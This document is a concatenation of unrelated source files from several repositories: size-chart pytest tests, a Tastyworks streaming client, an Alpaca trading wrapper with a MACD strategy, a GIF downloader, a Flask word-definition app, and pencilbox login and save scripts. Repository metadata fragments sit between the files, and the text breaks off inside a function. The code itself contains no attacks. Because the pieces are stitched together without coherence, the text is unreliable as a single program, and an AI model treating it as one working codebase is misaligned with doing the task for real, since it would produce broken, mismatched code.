(default_size_chart, 'XS', ('', 'XS', True)),
(default_size_chart, '1XS', ('', 'XS', True)),
(default_size_chart, '2XS', ('2', 'XS', True)),
(default_size_chart, '15XS', ('15', 'XS', True)),
(default_size_chart, 'XL', ('', 'XL', True)),
(default_size_chart, '1XL', ('', 'XL', True)),
(default_size_chart, '3XL', ('3', 'XL', True)),
(default_size_chart, '10XL', ('10', 'XL', True)),
(default_size_chart_and_dynops, 'M', ('', 'M', False)),
(default_size_chart_and_dynops, 'XS', ('', 'XS', True)),
(default_size_chart_and_dynops, '1XS', ('', 'XS', True)),
(default_size_chart_and_dynops, '2XS', ('2', 'XS', True)),
(default_size_chart_and_dynops, '15XS', ('15', 'XS', True)),
(default_size_chart_and_dynops, 'XL', ('', 'XL', True)),
(default_size_chart_and_dynops, '1XL', ('', 'XL', True)),
(default_size_chart_and_dynops, '3XL', ('3', 'XL', True)),
(default_size_chart_and_dynops, '10XL', ('10', 'XL', True)),
(custom_size_chart, 'B', ('', 'B', False)),
(custom_size_chart, 'A', ('', 'A', True)),
(custom_size_chart, '1A', ('', 'A', True)),
(custom_size_chart, '3A', ('3', 'A', True)),
(custom_size_chart, '14A', ('14', 'A', True)),
(custom_size_chart, 'C', ('', 'C', True)),
(custom_size_chart, '1C', ('', 'C', True)),
(custom_size_chart, '5C', ('5', 'C', True)),
(custom_size_chart, '100C', ('100', 'C', True)),
],)
def test_parse_size_key(size_chart, size_key, expected_tpl):
assert size_chart()._parse_size_key(size_key) == expected_tpl
#TODO - Test Verbose and XXL keys
@pytest.mark.parametrize("size_chart, size_key, expected_tpl",
[(default_size_chart, '-1XS', (ValueError, 'positive number or not set')),
(default_size_chart, '+5XL', (ValueError, 'positive number or not set')),
(default_size_chart_and_dynops, '-1XS', (ValueError, 'positive number or not set')),
(default_size_chart_and_dynops, '+5XL', (ValueError, 'positive number or not set')),
(custom_size_chart, '+2A', (ValueError, 'positive number or not set')),
(custom_size_chart, '-5C', (ValueError, 'positive number or not set')),
],)
def test_parse_size_key_exception(size_chart, size_key, expected_tpl):
with pytest.raises(expected_tpl[0]) as ee:
size_chart()._parse_size_key(size_key)
assert str(ee.value).find(expected_tpl[1]) > -1
#TODO - Test Verbose and XXL keys
def test_dynamic_size_cache(default_size_chart):
chart_size = len(default_size_chart)
default_size_chart.get_or_create_size('2XS') #Size should remain the same
assert chart_size == len(default_size_chart)
default_size_chart.enable_dynamic_size_cache()
default_size_chart.get_or_create_size('2XL') #Size should increase now
chart_size += 1
assert chart_size == len(default_size_chart)
@pytest.mark.parametrize("size_chart, size_key, expected_tpl",
[(default_size_chart, 'XS', ('XS', 0, 'X-Small', True, ('2XS', 'S'))),
(default_size_chart, '1XS', ('XS', 0, 'X-Small', True, ('2XS', 'S'))),
(default_size_chart, '2XS', ('2XS', -10, '2X-Small', True, ('3XS', 'XS'))),
(default_size_chart, '15XS', ('15XS', -140, '15X-Small', True, ('16XS', '14XS'))),
(default_size_chart, 'XL', ('XL', 100, 'X-Large', True, ('L', '2XL'))),
(default_size_chart, '1XL', ('XL', 100, 'X-Large', True, ('L', '2XL'))),
(default_size_chart, '3XL', ('3XL', 120, '3X-Large', True, ('2XL', '4XL'))),
(default_size_chart, '10XL', ('10XL', 190, '10X-Large', True, ('9XL', '11XL'))),
(default_size_chart_and_dynops, 'XS', ('XS', 0, 'X-Small', True, ('2XS', 'S'))),
(default_size_chart_and_dynops, '1XS', ('XS', 0, 'X-Small', True, ('2XS', 'S'))),
(default_size_chart_and_dynops, '2XS', ('2XS', -10, '2X-Small', True, ('3XS', 'XS'))),
(default_size_chart_and_dynops, '15XS', ('15XS', -140, '15X-Small', True, ('16XS', '14XS'))),
(default_size_chart_and_dynops, 'XL', ('XL', 100, 'X-Large', True, ('L', '2XL'))),
(default_size_chart_and_dynops, '1XL', ('XL', 100, 'X-Large', True, ('L', '2XL'))),
(default_size_chart_and_dynops, '3XL', ('3XL', 120, '3X-Large', True, ('2XL', '4XL'))),
(default_size_chart_and_dynops, '10XL', ('10XL', 190, '10X-Large', True, ('9XL', '11XL'))),
(custom_size_chart, 'A', ('A', 1, 'A', True, ('2A', 'B'))),
(custom_size_chart, '1A', ('A', 1, 'A', True, ('2A', 'B'))),
(custom_size_chart, '3A', ('3A', -9, '3A', True, ('4A', '2A'))),
(custom_size_chart, '14A', ('14A', -64, '14A', True, ('15A', '13A'))),
(custom_size_chart, 'C', ('C', 3, 'C', True, ('B', '2C'))),
(custom_size_chart, '1C', ('C', 3, 'C', True, ('B', '2C'))),
(custom_size_chart, '5C', ('5C', 23, '5C', True, ('4C', '6C'))),
(custom_size_chart, '100C', ('100C', 498, '100C', True, ('99C', '101C'))),
],)
def test_generate_dynamic_size(size_chart, size_key, expected_tpl):
size_chart_gen = size_chart()._generate_dynamic_size(size_key)
assert isinstance(size_chart_gen, Size)
assert size_chart_gen.key == expected_tpl[0]
assert size_chart_gen.sort_value == expected_tpl[1]
assert size_chart_gen.verbose == expected_tpl[2]
assert size_chart_gen.is_dynamic_size == expected_tpl[3]
assert size_chart_gen.previous_size_key == expected_tpl[4][0]
assert size_chart_gen.next_size_key == expected_tpl[4][1]
#TODO - Test XXL keys
@pytest.mark.parametrize("size_chart, size_key, expected_tpl",
[(default_size_chart, '5M', (ValueError, 'Suffix is not defined as Dynamic Size')),
(default_size_chart, 'B', (ValueError, 'Suffix is not defined as Dynamic Size')),
(default_size_chart, '-5XS', (ValueError, 'positive number or not set')),
(default_size_chart, '+4XL', (ValueError, 'positive number or not set')),
],)
def test_generate_dynamic_size_exception(size_chart, size_key, expected_tpl):
with pytest.raises(expected_tpl[0]) as ee:
default_size_chart()._generate_dynamic_size(size_key)
assert str(ee.value).find(expected_tpl[1]) > -1
#TODO - Test XXL keys
@pytest.mark.parametrize("size_chart, size_key, expected_tpl",
[(default_size_chart, 'S', ('S', False, None, ('XS', 'M'))),
(default_size_chart, 'M', ('M', False, None, ('S', 'L'))),
(default_size_chart, 'L', ('L', False, None, ('M', 'XL'))),
(default_size_chart, '1XL', ('XL', False, None, ('L', '2XL'))),
(default_size_chart, '2XL', ('XL', True, 1, ('XL', '3XL'))),
(default_size_chart, '3XS', ('XS', True, 2, ('4XS', '2XS'))),
(default_size_chart_and_dynops, 'S', ('S', False, None, ('XS', 'M'))),
(default_size_chart_and_dynops, 'M', ('M', False, None, ('S', 'L'))),
(default_size_chart_and_dynops, 'L', ('L', False, None, ('M', 'XL'))),
(default_size_chart_and_dynops, '2XL', ('XL', True, 1, ('XL', '3XL'))),
(default_size_chart_and_dynops, '1XS', ('XS', False, 0, ('2XS', 'S'))),
(default_size_chart_and_dynops, '3XS', ('XS', True, 2, ('4XS', '2XS'))),
],)
#expected_tpl = (dynamic key base key, is dynamic key, factor, (previous size key, next size key))
def test_size_key_to_size(size_chart, size_key, expected_tpl):
dyn_size_base, _ = size_chart()._size_key_to_size(expected_tpl[0])
assert dyn_size_base.key == expected_tpl[0]
assert dyn_size_base.sort_value == SIZE_CHART_DEFAULTS[expected_tpl[0]].sort_value
dyn_size, is_new = size_chart()._size_key_to_size(size_key)
assert is_new == expected_tpl[1]
assert (dyn_size.key not in size_chart().size_chart) == expected_tpl[1]
if not is_new:
return
assert dyn_size.key == size_key
exp_dyn_op = size_chart().dyn_ops[dyn_size_base.key]
exp_factor = expected_tpl[2] * (exp_dyn_op.growth_direction * exp_dyn_op.sort_value_increment)
assert dyn_size.sort_value == SIZE_CHART_DEFAULTS[expected_tpl[0]].sort_value + exp_factor
assert dyn_size.sort_value == dyn_size_base.sort_value + exp_factor
assert dyn_size.previous_size_key == expected_tpl[3][0]
assert dyn_size.next_size_key == expected_tpl[3][1]
#TODO - Test Verbose and XXL keys
@pytest.mark.parametrize("default_size_chart, size_key, expected_tpl",
[(default_size_chart, '5M', (ValueError, 'Base size not')),
(default_size_chart, 'B', (ValueError, 'Suffix is not defined as Dynamic')),
(default_size_chart, '-5XS', (ValueError, 'positive number or not set')),
(default_size_chart, '+4XL', (ValueError, 'positive number or not set')),
],)
def test_test_size_key_to_size_exception(default_size_chart, size_key, expected_tpl):
with pytest.raises(expected_tpl[0]) as ee:
default_size_chart()._size_key_to_size(size_key)
assert str(ee.value).find(expected_tpl[1]) > -1
@pytest.mark.parametrize("size_chart, size_key, expected_tpl",
[(default_size_chart, 'S', ('S', None, ('XS', 'M'))),
(default_size_chart, 'M', ('M', None, ('S', 'L'))),
(default_size_chart, 'L', ('L', None, ('M', 'XL'))),
(default_size_chart, '2XL', ('XL', 1, ('XL', '3XL'))),
(default_size_chart, '3XS', ('XS', 2, ('4XS', '2XS'))),
(default_size_chart_and_dynops, 'S', ('S', None, ('XS', 'M'))),
(default_size_chart_and_dynops, 'M', ('M', None, ('S', 'L'))),
(default_size_chart_and_dynops, 'L', ('L', None, ('M', 'XL'))),
(default_size_chart_and_dynops, '2XL', ('XL', 1, ('XL', '3XL'))),
(default_size_chart_and_dynops, '3XS', ('XS', 2, ('4XS', '2XS'))),
],)
#expected_tpl = (dynamic key base key, factor, (previous size key, next size key))
def test_get_or_create_size(size_chart, size_key, expected_tpl):
dyn_size_base = size_chart().get_or_create_size(expected_tpl[0])
assert dyn_size_base.key == expected_tpl[0]
assert dyn_size_base.sort_value == SIZE_CHART_DEFAULTS[expected_tpl[0]].sort_value
if size_key not in size_chart().size_chart:
dyn_size = size_chart().get_or_create_size(size_key)
assert dyn_size.key == size_key
assert dyn_size.key == size_key
exp_dyn_op = size_chart().dyn_ops[dyn_size_base.key]
exp_factor = expected_tpl[1] * (exp_dyn_op.growth_direction * exp_dyn_op.sort_value_increment)
assert dyn_size.sort_value == SIZE_CHART_DEFAULTS[expected_tpl[0]].sort_value + exp_factor
assert dyn_size.sort_value == dyn_size_base.sort_value + exp_factor
assert dyn_size.previous_size_key == expected_tpl[2][0]
assert dyn_size.next_size_key == expected_tpl[2][1]
#TODO - Test Verbose and XXL keys
@pytest.mark.parametrize("default_size_chart, size_key, expected_tpl",
[(default_size_chart, '5M', (ValueError, 'Base size not')),
(default_size_chart, 'B', (ValueError, 'Suffix is not defined as Dynamic')),
(default_size_chart, '-5XS', (ValueError, 'positive number or not set')),
(default_size_chart, '+4XL', (ValueError, 'positive number or not set')),
],)
def test_get_or_create_size_exception(default_size_chart, size_key, expected_tpl):
with pytest.raises(expected_tpl[0]) as ee:
default_size_chart().get_or_create_size(size_key)
assert str(ee.value).find(expected_tpl[1]) > -1
@pytest.mark.parametrize("size_chart, list_length, expected_list",
[(default_size_chart, 1, ['M']),
(default_size_chart, 2, ['M','L']),
(default_size_chart, 3, ['S','M','L']),
(default_size_chart, 5, ['XS','S','M','L','XL']),
(default_size_chart, None, ['XS','S','M','L','XL']),
(default_size_chart, 6, ['XS','S','M','L', 'XL','2XL']),
(default_size_chart, 7, ['2XS','XS','S','M','L','XL','2XL']),
(default_size_chart, 8, ['2XS','XS','S','M','L','XL','2XL','3XL']),
(default_size_chart_and_dynops, 1, ['M']),
(default_size_chart_and_dynops, 2, ['M','L']),
(default_size_chart_and_dynops, 3, ['S','M','L']),
(default_size_chart_and_dynops, 5, ['XS','S','M','L','XL']),
(default_size_chart_and_dynops, None, ['XS','S','M','L','XL']),
(default_size_chart_and_dynops, 6, ['XS','S','M','L', 'XL','2XL']),
(default_size_chart_and_dynops, 7, ['2XS','XS','S','M','L','XL','2XL']),
(default_size_chart_and_dynops, 8, ['2XS','XS','S','M','L','XL','2XL','3XL']),
(custom_size_chart, 1, ['B']),
(custom_size_chart, 2, ['B','C']),
(custom_size_chart, 3, ['A','B','C']),
(custom_size_chart, 5, ['2A','A','B','C','2C']),
(custom_size_chart, None, ['2A','A','B','C','2C']),
(custom_size_chart, 7, ['3A','2A','A','B','C','2C','3C']),
],)
def test_generate_lengthed_list(size_chart, list_length, expected_list):
#Generate list is supposed to remove from left first for smaller, and add to right for larger
assert size_chart().generate_lengthed_list(list_length) == expected_list
#TODO - Test Verbose and XXL keys
#TODO - Test Single-Ended
@pytest.mark.parametrize("size_chart, list_length, expected_tpl",
[(default_size_chart, 100, (ValueError, 'Length of list exceeds')),
],)
def test_generate_lengthed_list_exception(size_chart, list_length, expected_tpl):
with pytest.raises(expected_tpl[0]) as ee:
default_size_chart().generate_lengthed_list(list_length)
assert str(ee.value).find(expected_tpl[1]) > -1
@pytest.mark.parametrize("size_chart, start_range, end_range, expected_list",
[(default_size_chart, 'M', 'M', ['M']),
(default_size_chart, 'S', 'M', ['S','M']),
(default_size_chart, 'XS', 'XL', ['XS','S','M','L','XL']),
(default_size_chart, '2XS', 'XL', ['2XS','XS','S','M','L','XL']),
(default_size_chart, 'M', '3XL', ['M','L','XL','2XL','3XL']),
(default_size_chart, '2XS', '2XL', ['2XS','XS','S','M','L','XL','2XL']),
(default_size_chart_and_dynops, 'S', 'S', ['S']),
(default_size_chart_and_dynops, 'S', 'L', ['S','M','L']),
(default_size_chart_and_dynops, 'XS', 'XL', ['XS','S','M','L','XL']),
(default_size_chart_and_dynops, '2XS', 'XL', ['2XS','XS','S','M','L','XL']),
(default_size_chart_and_dynops, 'S', '2XL', ['S','M','L','XL','2XL']),
(default_size_chart_and_dynops, '2XS', '2XL', ['2XS','XS','S','M','L','XL','2XL']),
(custom_size_chart, 'B', 'C', ['B','C']),
(custom_size_chart, 'A', 'C', ['A','B','C']),
(custom_size_chart, '3A', 'B', ['3A','2A','A','B']),
(custom_size_chart, 'A', '4C', ['A','B','C','2C','3C','4C']),
(custom_size_chart, '2A', '2C', ['2A','A','B','C','2C']),
# (baby_toddler_kids_size_chart, 'P', '12M', ['P', 'NB', '3M','6M', '9M','12M']),
# (baby_toddler_kids_size_chart, '6M', '5', ['6M', '9M','12M', '2T', '3T', '4T', '4', '5T', '5']),
],)
def test_generate_range(size_chart, start_range, end_range, expected_list):
assert list(size_chart().generate_range_iter(start_range, end_range)) == expected_list
assert size_chart().generate_range_list(start_range, end_range) == expected_list
#TODO - Test Verbose and XXL keys
#TODO - Test Single-Ended
@pytest.mark.parametrize("size_chart, start_range, end_range, expected_tpl",
[(default_size_chart, '5M', '5M', (ValueError, 'Base size not')),
(default_size_chart, 'M', '5M', (ValueError, 'Suffix is not defined as Dynamic')),
(default_size_chart, 'B', 'C', (ValueError, 'Base size not')),
(default_size_chart, '-5XS', '-3XS', (ValueError, 'positive number or not set')),
(default_size_chart, 'XS', '-3XS', (ValueError, 'positive number or not set')),
(default_size_chart, '+4XL', '+7XL', (ValueError, 'positive number or not set')),
(default_size_chart, 'XL', '+7XL', (ValueError, 'positive number or not set')),
# (baby_toddler_kids_size_chart, '1T', '5T', (ValueError, 'Base size not')),
# (baby_toddler_kids_size_chart, '5T', '8T', (ValueError, 'Base size not')),
# (baby_toddler_kids_size_chart, '2M', '12M', (ValueError, 'Base size not')),
# (baby_toddler_kids_size_chart, '3M', '5M', (ValueError, 'Base size not')),
# (baby_toddler_kids_size_chart, '6M', '36M', (ValueError, 'Base size not')),
],)
def test_generate_range_exception(size_chart, start_range, end_range, expected_tpl):
with pytest.raises(expected_tpl[0]) as ee:
list(size_chart().generate_range_iter(start_range, end_range)) #Need to invoke iter
with pytest.raises(expected_tpl[0]) as ee:
size_chart().generate_range_list(start_range, end_range)
assert str(ee.value).find(expected_tpl[1]) > -1
if __name__ == "__main__":
pytest.main(['-q', '-s', '--no-cov', 'tests/test_sizechart.py'])
``` |
{
"source": "jonovate/tastyworks_api",
"score": 2
} |
#### File: tastyworks_api/tastyworks/streamer.py
```python
import asyncio
import datetime
import json
import logging
import threading
from typing import List
import requests
import websockets
from tastyworks.dxfeed import mapper as dxfeed_mapper
from tastyworks.models.session import TastyAPISession
LOGGER = logging.getLogger(__name__)
# TODO:
# * Proper exception handling and bubbling
# * Figure out how to remove stream subscriptions
class DataStreamer(object):
def __init__(self, session: TastyAPISession, timeout=60):
if not session.is_active():
raise Exception('TastyWorks API session not active/valid')
self.tasty_session = session
self.timeout = timeout
self.connection = None
self.streamer_logged_in = False
self.subs = {}
self.lock = asyncio.Lock()
asyncio.get_event_loop().run_until_complete(
self._setup_connection()
)
def __del__(self):
self.ka_thread.join() # Kill the keep-alive thread
self.connection.close()
def _get_nonce(self):
# NOTE: It seems a mutex is not necessary as long as we
# have no replay of messages (i.e. do not send with same/lower number)
self.nonce = getattr(self, 'nonce', 0) + 1
return self.nonce
async def add_data_sub(self, values):
LOGGER.debug(f'Adding subscription: {values}')
# TODO: fragment message if need be, max 64k
message = [
{
'channel': '/service/sub',
'clientId': self.client_id,
'id': self._get_nonce(),
'data': {
'add': values
}
}
]
await self._send_msg(message)
async def remove_data_sub(self, values):
# NOTE: Experimental, unconfirmed. Needs testing
LOGGER.info(f'Removing subscription: {values}')
message = [
{
'channel': '/service/sub',
'clientId': self.client_id,
'id': self._get_nonce(),
'data': {
'remove': values
}
}
]
await self._send_msg(message)
def _get_login_msg(self) -> str:
auth_token = self.get_streamer_token()
return json.dumps([{
'ext': {
'com.devexperts.auth.AuthToken': f'{auth_token}'
},
'id': self._get_nonce(),
'version': '1.0',
'minimumVersion': '1.0',
'channel': '/meta/handshake',
'supportedConnectionTypes': [
'websocket',
'long-polling',
'callback-polling'
],
'advice': {
'timeout': self.timeout * 1000,
'interval': 0
}
}])
def _get_connect_msg(self, advice=True) -> List:
if advice:
msg = [
{
"advice": {
"timeout": 0
},
"channel": "/meta/connect",
"clientId": self.client_id,
"connectionType": "websocket",
"id": self._get_nonce()
}
]
else:
msg = [
{
"channel": "/meta/connect",
"clientId": self.client_id,
"connectionType": "websocket",
"id": self._get_nonce()
}
]
return msg
async def _consumer(self, message):
msg_object = json.loads(message)
LOGGER.debug('Object conversion: %s', msg_object)
return dxfeed_mapper.map_message(msg_object)
async def _send_msg(self, message):
if not self.logged_in:
raise Exception('Connection not made and logged in')
if not isinstance(message, str):
message = json.dumps(message)
LOGGER.debug('[dxFeed] sending: %s', message)
await self.connection.send(message)
async def reset_data_subs(self):
LOGGER.info('Resetting data subscriptions')
msg = [
{
"channel": "/service/sub",
"clientId": self.client_id,
"data": {
"reset": True
},
"id": self._get_nonce()
}
]
await self._send_msg(msg)
await self.connection.recv()
def get_streamer_token(self):
return self._get_streamer_data()['data']['token']
def _get_streamer_data(self):
if not self.tasty_session.logged_in:
raise Exception('Logged in session required')
if hasattr(self, 'streamer_data_created') and (datetime.datetime.now() - self.streamer_data_created).total_seconds() < 60:
return self.streamer_data
resp = requests.get(f'{self.tasty_session.API_url}/quote-streamer-tokens', headers=self.tasty_session.get_request_headers())
if resp.status_code != 200:
raise Exception('Could not get quote streamer data, error message: {}'.format(
resp.json()['error']['message']
))
self.streamer_data = resp.json()
self.streamer_data_created = datetime.datetime.now()
return resp.json()
def _get_streamer_websocket_url(self):
socket_url = self._get_streamer_data()['data']['websocket-url']
socket_url = socket_url.replace('https://', '')
full_url = 'wss://{}/cometd'.format(socket_url)
return full_url
async def _setup_connection(self):
streamer_url = self._get_streamer_websocket_url()
LOGGER.info('Connecting to url: %s', streamer_url)
socket = await websockets.connect(streamer_url)
# login
LOGGER.debug('Sending login message: %s', self._get_login_msg())
await socket.send(self._get_login_msg())
login_resp = json.loads(await socket.recv())
login_resp = login_resp[0]
advised_timeout = login_resp['advice']['timeout']
LOGGER.debug('Received login response: %s', login_resp)
if not login_resp['successful']:
raise Exception('Could not login to dxFeed stream')
self.client_id = login_resp['clientId']
self.connection = socket
self.logged_in = True
LOGGER.info('Connected and logged in to dxFeed data stream')
await self.reset_data_subs()
# connect
await self._send_msg(self._get_connect_msg())
await socket.recv()
# set up advice-based keep-alives/pings
loop = asyncio.get_event_loop()
self.ka_thread = threading.Thread(
target=self._set_ka_loop,
args=(loop, advised_timeout),
daemon=True
)
self.ka_thread.start()
LOGGER.info('Connection setup completed!')
def _set_ka_loop(self, loop, period):
LOGGER.info('Starting keep-alive thread with period: %s ms', period)
asyncio.run_coroutine_threadsafe(self._keep_alive(period), loop)
async def _keep_alive(self, period: int):
"""
Handles the keep-alive message.
Args:
period: The time period, must be in milliseconds.
"""
while True:
LOGGER.debug('Sending keep-alive message')
await self._send_msg(self._get_connect_msg(advice=False))
await asyncio.sleep(period / 1000)
async def listen(self):
async for msg in self.connection:
LOGGER.debug('[dxFeed] received: %s', msg)
res = await self._consumer(msg)
if not res:
continue
yield res
``` |
{
"source": "jonowens/cryptoCache",
"score": 4
} |
#### File: cryptoCache/carolina/form.py
```python
from flask import Flask, request, render_template
# Flask constructor
app = Flask(__name__)
# A decorator used to tell the application
# which URL is associated function
@app.route('/', methods =["GET", "POST"])
def gfg():
if request.method == "POST":
# getting input with name = fname in HTML form
first_name = request.form.get("fname")
# getting input with name = lname in HTML form
last_name = request.form.get("lname")
return "Your name is "+first_name + last_name
return render_template("form.html")
if __name__=='__main__':
app.run()
``` |
{
"source": "jonowens/mr_si_boller_strategy",
"score": 3
} |
#### File: mr_si_boller_strategy/libs/connections.py
```python
from dotenv import load_dotenv
import os
import requests
import json
import pandas as pd
import alpaca_trade_api as tradeapi
load_dotenv()
key = os.getenv('APCA_API_KEY')
secret_key = os.getenv('APCA_API_SECRET_KEY')
paper_url = os.getenv('APCA_API_PAPER_URL')
current_price = 0.00
class alpaca_trading_connection:
def __init__(self):
self.alpaca_api = tradeapi.REST(key, secret_key, paper_url, api_version='v2')
def get_account_info(self):
res = self.alpaca_api.get_account()
return res
def get_asset_price(self, symbol):
data = self.alpaca_api.get_last_trade(symbol)
return data.price
def get_asset_history(self, symbol, timeframe, num_intervals, starting_date, ending_date):
# Format date range of historical data
start_date = pd.Timestamp(starting_date, tz="America/New_York").isoformat()
end_date = pd.Timestamp(ending_date, tz="America/New_York").isoformat()
# Get historical data
hist_data = self.alpaca_api.get_barset(symbol, timeframe, num_intervals, start=start_date, end=end_date)
# Return data
return hist_data
def place_buy_order(self, symbol, quantity):
order_res = self.alpaca_api.submit_order(symbol, quantity, 'buy', type='market', time_in_force='fok')
return order_res
def place_sell_order(self, symbol, quantity):
order_res = self.alpaca_api.submit_order(symbol, quantity, 'sell', type='market', time_in_force='fok')
return order_res
def close_all_positions(self):
close_all_pos_res = self.alpaca_api.close_all_positions()
return close_all_pos_res
def get_positions(self):
pos_res = self.alpaca_api.list_positions()
return pos_res
# Create and submit buy order and include One Cancels Other (OTO) configuration
def place_buy_otoco_order(self, symbol, quantity, desired_profit_percent: int=2, max_loss_percent: int=1):
# Get current asset price
current_price = self.get_asset_price(symbol)
# Determine profit limit based on passed parameter
profit_price = current_price * (1 + (desired_profit_percent / 100))
# Determine loss trigger based on passed parameter
loss_price = current_price * (1 - ((max_loss_percent) / 100))
# Create One Cancels Other (OCO) dictionaries for bracket
profit_dict = {
'limit_price': profit_price
}
loss_dict = {
'stop_price': loss_price
}
# Submit trade
order_res = self.alpaca_api.submit_order(
symbol,
quantity,
side='buy',
type='market',
time_in_force='gtc',
order_class='bracket',
take_profit=profit_dict,
stop_loss=loss_dict)
return order_res
def get_all_assets_to_trade(self):
# Get all available assets from Alpaca
active_assets = self.alpaca_api.list_assets(status='active')
# Return assets
return active_assets
```
#### File: mr_si_boller_strategy/libs/strategies.py
```python
import pandas as pd
from stockstats import StockDataFrame as Sdf
def test_macd_strategy(stock_df, stock_symbol):
''' Tests MACD Strategy
Args:
stock_df (df): Asset dataframe containing ticker symbol key and
column headings: 'open', 'close', 'high', 'low', and 'volume'.
Returns:
BUY, SELL, or HOLD string signal
'''
# Sort columns for stockdataframe
data = stock_df[stock_symbol][['open', 'close', 'high', 'low', 'volume']]
# Change from pandas dataframe to stockdataframe
stock = Sdf.retype(data)
# Signal line
signal = stock['macds']
# The MACD that needs to cross the signal line to give you a Buy/Sell signal
macd = stock['macd']
for i in range(1, len(signal)):
# If the MACD crosses the signal line upward
if macd[i] > signal[i] and macd[i - 1] <= signal[i - 1]:
return 'BUY'
# The other way around
elif macd[i] < signal[i] and macd[i - 1] >= signal[i - 1]:
return 'SELL'
# Do nothing if not crossed
else:
return 'HOLD'
``` |
{
"source": "jonowo/walfie-gif-dl",
"score": 3
} |
#### File: jonowo/walfie-gif-dl/download.py
```python
import itertools
import json
import logging
import os
import re
import shutil
import time
import requests
DOWNLOAD_PATH = "gifs/"
logging.basicConfig(level="INFO", format="%(asctime)s - %(name)s - %(levelname)s - %(message)s")
logger = logging.getLogger(__name__)
def get_filename(name) -> str:
# Sanitize filename
fn = "".join(c if c.isalnum() else "_" for c in name)
fn = re.sub("_+", "_", fn)
ext = ".gif"
# Find next available filename
if not os.path.exists(DOWNLOAD_PATH + fn + ext):
return DOWNLOAD_PATH + fn + ext
for i in itertools.count(1):
if not os.path.exists(DOWNLOAD_PATH + fn + str(i) + ext):
return DOWNLOAD_PATH + fn + str(i) + ext
if os.path.isdir(DOWNLOAD_PATH):
shutil.rmtree(DOWNLOAD_PATH)
os.mkdir(DOWNLOAD_PATH)
with open("data.json") as f:
data = json.load(f)
# Download GIFs
logger.info(f"Downloading {len(data)} GIFs...")
# Download older posts first to make sure their file names are not taken
for post in data[::-1]:
resp = requests.get(post["gif"])
resp.raise_for_status()
fn = get_filename(post["title"])
post["path"] = fn
with open(fn, "wb") as f:
f.write(resp.content)
time.sleep(0.25)
logger.info("Download complete.")
with open("data.json", "w") as f:
json.dump(data, f, indent=4)
``` |
{
"source": "jonowo/wsd",
"score": 2
} |
#### File: wsd/wsd/__init__.py
```python
import html
import json
import logging
import os
from typing import Any, List
logging.basicConfig(level="INFO", format="%(asctime)s - %(name)s - %(levelname)s - %(message)s")
from dotenv import load_dotenv
from flask import Flask, render_template
from .constants import POS_MAPPING, SPACY_EXPLAIN, nlp
from .forms import QueryForm
from .mw import MerriamWebster
logger = logging.getLogger(__name__)
load_dotenv()
app = Flask(__name__)
app.secret_key = os.environ["SECRET_KEY"]
mw_client = MerriamWebster(os.environ["MW_LEARNERS_API_KEY"])
def get_definitions(text: str, base_form: str, pos: str) -> List[Any]:
# Search by base form (e.g. burning -> burn)
res = mw_client.search(base_form)
if not res:
return []
# Exact matches
res = [e for e in res if text == e["base_form"].lower()] or res
# "Stems" of a word contain all its possible forms (e.g. be: is, was, been, etc.)
res = [e for e in res if text in e["stems"]
] or [e for e in res if base_form in e["stems"]] or res
# Filter out senses which are not of the same part of speech identified earlier
res = [e for e in res if e["pos"] in POS_MAPPING.get(pos, [])] or res
return res[:3] # Up to 3 definitions
@app.route("/", methods=["GET", "POST"])
def home():
form = QueryForm()
if form.validate_on_submit():
sentence = form.sentence.data.strip()
logger.info("Query: %s", sentence)
doc = nlp(sentence)
spans = []
for token in doc:
escaped_text = html.escape(token.text)
if token.pos_ in ("PUNCT", "SYM", "SPACE", "X") or not token.text.isalpha():
# No definition
spans.append((escaped_text, token))
continue
if token.pos_ == "PROPN":
spans.append(
(
f'<a class="ss" data-pos-explain="{html.escape(SPACY_EXPLAIN[token.pos_])}">'
+ escaped_text + '</a>', token
)
)
continue
entries = get_definitions(token.text.lower(), token.lemma_, token.pos_)
spans.append(
(
f'<a class="ss" data-pos-explain="{html.escape(SPACY_EXPLAIN[token.pos_])}" '
f'data-defs="{html.escape(json.dumps(entries))}">' + escaped_text + "</a>",
token
)
)
s = sentence
sentence_html = ""
for span, token in spans:
while not s.startswith(token.text):
sentence_html += html.escape(s[0])
s = s[1:]
sentence_html += span
s = s[len(token.text):]
sentence_html += html.escape(s)
mw_client.save_cache()
return render_template("home.html", form=form, sentence=sentence_html)
return render_template("home.html", form=form)
``` |
{
"source": "jonoxia/pencilbox",
"score": 3
} |
#### File: jonoxia/pencilbox/login.py
```python
import cgi
import cgitb
import uuid
import Cookie
import subprocess
import simplejson
from database_tables import Artist
from pencilbox_config import DOMAIN
def verifyBrowserId(assertion):
postargs = "assertion=%s&audience=%s" % (assertion, DOMAIN)
url = "https://browserid.org/verify"
# TODO verify SSL?
process = subprocess.Popen(["curl", "-d", postargs, url],
stdout = subprocess.PIPE )
data = simplejson.loads(process.communicate()[0])
# expect browserid.org/verify to return fields like this:{
# "status": "okay",
# "email": "<EMAIL>",
# "audience": "mysite.com",
# "valid-until": 1308859352261,
# "issuer": "browserid.org:443"
if data["status"] == "okay":
return data["email"]
else:
return False
if __name__ == "__main__":
cgitb.enable()
q = cgi.FieldStorage()
print "Content-type: text/html"
print
assertion = q.getfirst("assertion", "")
email = verifyBrowserId(assertion)
if (email == False):
print simplejson.dumps({"logged_in": "false"})
else:
session = str(uuid.uuid1())
matches = Artist.selectBy( email = email )
if (matches.count() == 0):
# user has not logged in before: create account
kwargs = {"email": email,
"name": email.split("@")[0], # use first part of email address as username
"session": session}
newUser = Artist(**kwargs)
else:
oldUser = matches[0]
oldUser.session = session
# Return JSON to the client's XHR containing email and session uuid
print simplejson.dumps({"logged_in": "true", "email": email, "session": session})
```
#### File: jonoxia/pencilbox/save.py
```python
from database_tables import DrawingHistory
from webserver_utils import verify_id
import cgi
import cgitb
import datetime
def createNew(title, creator, history, layers):
kwargs = {"date": datetime.datetime.now(),
"title": title,
"history_json": history,
"layer_json": layers,
"creator": creator}
newEntry = DrawingHistory(**kwargs)
def updateOld(entry, history, layers):
entry.date = datetime.datetime.now()
entry.history_json = history
entry.layer_json = layers
cgitb.enable()
q = cgi.FieldStorage()
history = q.getfirst("history", "")
layers = q.getfirst("layers", "")
title = q.getfirst("title", "")
artist = verify_id()
matches = DrawingHistory.selectBy(title = title, creator=artist)
if matches.count() > 0:
updateOld(matches[0], history, layers)
else:
createNew(title, artist, history, layers)
print "Content-type: text/html"
print
print "OK, saved"
```
#### File: jonoxia/pencilbox/webserver_utils.py
```python
import Cookie
import os
import sys
import string
from pencilbox_config import TEMPLATE_DIR, ARTIST_FILE_BASE_DIR
from database_tables import Artist
def render_template_file( filename, substitutionDict ):
